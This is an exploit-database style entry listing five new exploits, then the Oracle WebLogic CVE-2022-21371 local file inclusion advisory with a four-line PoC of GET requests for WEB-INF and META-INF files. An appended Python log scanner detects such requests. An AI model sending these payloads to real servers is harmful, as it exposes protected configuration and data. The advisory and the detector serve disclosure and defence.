
5 changes to exploits/shellcodes

PolicyKit-1 0.105-31 - Privilege Escalation
Oracle WebLogic Server 14.1.1.0.0 - Local File Inclusion
WordPress Plugin Mortgage Calculators WP 1.52 - Stored Cross-Site Scripting (XSS) (Authenticated)
WordPress Plugin RegistrationMagic V 5.0.1.5 - SQL Injection (Authenticated)
WordPress Plugin Modern Events Calendar V 6.1 - SQL Injection (Unauthenticated)
# Exploit Title: Oracle WebLogic Server 14.1.1.0.0 - Local File Inclusion
# Date: 25/1/2022
# Exploit Author: Jonah Tan (@picar0jsu)
# Vendor Homepage: https://www.oracle.com
# Software Link: https://www.oracle.com/middleware/technologies/weblogic-server-installers-downloads.html
# Version: 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0
# Tested on: Windows Server 2019
# CVE : CVE-2022-21371

# Description
Vulnerability in the Oracle WebLogic Server product of Oracle Fusion
Middleware (component: Web Container).
Supported versions that are affected are 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0
and 14.1.1.0.0.
Easily exploitable vulnerability allows unauthenticated attacker with
network access via HTTP to compromise Oracle WebLogic Server.
Successful attacks of this vulnerability can result in unauthorized access
to critical data or complete access to all Oracle WebLogic Server
accessible data.

# PoC
GET .//META-INF/MANIFEST.MF
GET .//WEB-INF/web.xml
GET .//WEB-INF/portlet.xml
GET .//WEB-INF/weblogic.xml
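
# Detection (added example)
The following is an added example, not part of the original exploit entry: a log scanner that flags requests whose path reaches WEB-INF or META-INF, as the PoC requests above do, and records whether the server answered 200. The combined access log layout, the /app context root, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Directories the PoC paths reach; a servlet container should never serve them.
PROTECTED = ("WEB-INF", "META-INF")

# Assumed log layout: common/combined access log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)

def decode_path(target, rounds=3):
    """Drop the query string, then percent-decode until the path is stable."""
    path = target.split("?", 1)[0]
    for _ in range(rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path.replace("\\", "/")

def protected_hit(target):
    """Return the protected directory named by a path segment, else None."""
    for seg in decode_path(target).split("/"):
        # Ignore path parameters (";...") and case: the page's test host is Windows.
        name = seg.split(";", 1)[0].upper()
        if name in PROTECTED:
            return name
    return None

def scan(lines):
    """Return (client, target, directory, served) for each suspicious request."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and (hit := protected_hit(m["target"])):
            # A 200 means the file content was returned, not just probed for.
            findings.append((m["ip"], m["target"], hit, m["status"] == "200"))
    return findings

# Constructed sample log lines; /app is an assumed context root.
SAMPLE = [
    '203.0.113.7 - - [25/Jan/2022:10:00:01 +0000] "GET /app/.//WEB-INF/web.xml HTTP/1.1" 200 1840',
    '203.0.113.7 - - [25/Jan/2022:10:00:02 +0000] "GET /app/.//META-INF/MANIFEST.MF HTTP/1.1" 404 0',
    '198.51.100.4 - - [25/Jan/2022:10:00:03 +0000] "GET /app/index.jsp HTTP/1.1" 200 512',
    '198.51.100.4 - - [25/Jan/2022:10:00:04 +0000] "GET /app/docs/web-inf-guide.html HTTP/1.1" 200 900',
]
```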